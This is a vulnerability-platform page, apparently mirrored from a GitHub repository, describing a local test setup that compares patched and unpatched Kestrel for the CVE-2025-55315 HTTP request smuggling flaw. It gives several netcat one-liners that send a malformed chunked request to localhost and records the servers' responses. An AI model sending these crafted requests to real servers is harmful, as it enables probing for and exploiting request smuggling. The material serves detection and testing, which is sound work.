漏洞平台

POC详情： 5687378a7ab5eb33c9f95ad10336901b36eded3e

来源

https://github.com/nickcopi/CVE-2025-55315-detection-playground

关联漏洞

标题： Microsoft ASP.NET Core 环境问题漏洞 (CVE-2025-55315)
描述：Microsoft ASP.NET Core是美国微软（Microsoft）公司的一框跨平台开源框架。该框架用于构建Web应用、物联网应用和移动后端等基于云的应用程序。 Microsoft ASP.NET Core存在环境问题漏洞，该漏洞源于攻击者利用该漏洞可以绕过某些功能。

描述

Playground to experiment with different behavior on patched/unpatched Kestrel for the CVE-2025-55315 HTTP smuggling vulnerability

介绍


Here are some tests that can be performed against these services to observe different behavior on GET/POST routes between the patched and unpatched versions of Kestrel.


GET against unpatched (sends 200 and socket remains open)
```bash
printf 'GET / HTTP/1.1\r\nHost: localhost\r\nTransfer-Encoding: chunked\r\nContent-Type: text/plain\r\n\r\n2;\rxx\r\nxy\r\n0\r\n\r\n' | nc localhost 5002
```

GET against patched (sends 200 and socket closes)
```bash
printf 'GET / HTTP/1.1\r\nHost: localhost\r\nTransfer-Encoding: chunked\r\nContent-Type: text/plain\r\n\r\n2;\rxx\r\nxy\r\n0\r\n\r\n' | nc localhost 5001
```


No CT required POST against unpatched (sends 200 and socket remains open)
```bash
printf 'POST / HTTP/1.1\r\nHost: localhost\r\nTransfer-Encoding: chunked\r\nContent-Type: text/plain\r\n\r\n2;\rxx\r\nxy\r\n0\r\n\r\n' | nc localhost 5002
```


No CT required POST against patched (sends 400 and socket closes (process also throws a handled exception about Bad chunk extension))
```bash
printf 'POST / HTTP/1.1\r\nHost: localhost\r\nTransfer-Encoding: chunked\r\nContent-Type: text/plain\r\n\r\n2;\rxx\r\nxy\r\n0\r\n\r\n' | nc localhost 5001
```



CT required POST against unpatched (sends 415 and socket remains open)
```bash
printf 'POST /ct HTTP/1.1\r\nHost: localhost\r\nTransfer-Encoding: chunked\r\nContent-Type: text/plain\r\n\r\n2;\rxx\r\nxy\r\n0\r\n\r\n' | nc localhost 5002
```

CT required POST against patched (sends 415 and socket closes)

```bash
printf 'POST /ct HTTP/1.1\r\nHost: localhost\r\nTransfer-Encoding: chunked\r\nContent-Type: text/plain\r\n\r\n2;\rxx\r\nxy\r\n0\r\n\r\n' | nc localhost 5001
```

文件快照


 [4.0K]  /data/pocs/5687378a7ab5eb33c9f95ad10336901b36eded3e
├── [ 379]  docker-compose.yml
├── [4.0K]  kestrel-8-0-11
│   ├── [ 388]  Dockerfile
│   └── [ 453]  Program.cs
├── [4.0K]  kestrel-latest
│   ├── [ 388]  Dockerfile
│   └── [ 453]  Program.cs
└── [1.6K]  README.md

2 directories, 6 files

神龙机器人已为您缓存

备注

1. 建议优先通过来源进行访问。

2. 如果因为来源失效或无法访问，请发送邮箱到 f.jinxu#gmail.com 索取本地快照（把 # 换成 @）。

3. 神龙已为您对POC代码进行快照，为了长期维护，请考虑为本地POC付费，感谢您的支持。